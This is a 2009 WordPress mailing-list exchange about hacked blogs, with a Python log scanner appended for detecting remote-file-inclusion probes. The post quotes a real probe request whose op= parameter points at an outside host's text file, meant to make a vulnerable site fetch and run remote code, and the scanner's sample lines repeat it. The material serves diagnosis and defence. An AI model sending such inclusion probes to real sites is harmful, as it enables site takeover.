[wp-hackers] Hacked blogs

Joost de Valk joost at yoast.com
Thu Mar 26 15:44:01 GMT 2009

Chris Jean wrote:
> I'd just like to remind everyone that it is trivially simple to change
> the user agent string in libwww-perl. So, blocking that user agent
> does nothing to stop people who use randomly-generated user agents
> with their attack scripts while it does block people who create and
> use innocuous scripts for whatever reason.
>
> The problem here isn't libwww-perl (or any other user agent for that
> matter); rather, it is whatever hole is being exploited. If we all
> just block the libwww-perl user agent and pat ourselves on the back for
> a job well done, we'll be overrun when the exploiters simply change or
> randomize their user agent string.
>
> As for the matter at hand, I'll be very interested to hear more
> details on the situation, Joost. Have you found any leads on what is
> handling that op query string request?

Nope, can't find a bloody thing yet. These kinds of requests:

GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1

in all the logs, but grepping through the entire htdocs dir, nothing 
that responds to them.
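
An added example, not part of the original message or of anyone's code on this list: a log scan that flags requests by what they carry (a query parameter whose value is a remote URL, like the op= request above) instead of by user agent. It assumes Apache Combined Log Format; the sample lines are constructed, and find_rfi_probes and probed_parameters are hypothetical names.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself a remote URL is the mark of an inclusion probe.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines. Only the first request target comes from the message above;
# client addresses, timestamps, sizes, user agents and example.invalid are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Mar/2009:15:01:12 +0000] "GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [26/Mar/2009:15:03:40 +0000] "GET /index.php?op=http%3A%2F%2Fexample.invalid%2Fid.txt%3F HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"',
    '192.0.2.10 - - [26/Mar/2009:15:04:02 +0000] "GET /?p=42 HTTP/1.1" 200 8931 "-" "libwww-perl/5.805"',
    '192.0.2.55 - - [26/Mar/2009:15:05:19 +0000] "GET /?s=http+headers HTTP/1.1" 200 7702 "-" "Mozilla/5.0 (X11; U; Linux i686)"',
]

def find_rfi_probes(lines):
    """Return (ip, param, decoded_value, user_agent) for each query parameter holding a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; unquote again to catch double-encoded values
            decoded = unquote(value).strip()
            if REMOTE_URL_RE.match(decoded):
                hits.append((m.group("ip"), name, decoded, m.group("ua")))
    return hits

def probed_parameters(hits):
    """Map each probed parameter name to the set of user agents that sent it."""
    by_param = {}
    for _ip, name, _value, ua in hits:
        by_param.setdefault(name, set()).add(ua)
    return by_param

if __name__ == "__main__":
    for ip, name, value, ua in find_rfi_probes(SAMPLE_LOG):
        print(f"{ip} param={name} value={value} ua={ua}")
```

A hit shows that a probe was sent, not that anything on the site handled the parameter. Grouping by parameter name keeps the two op= probes together under different user agents and leaves the harmless libwww-perl request unflagged.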
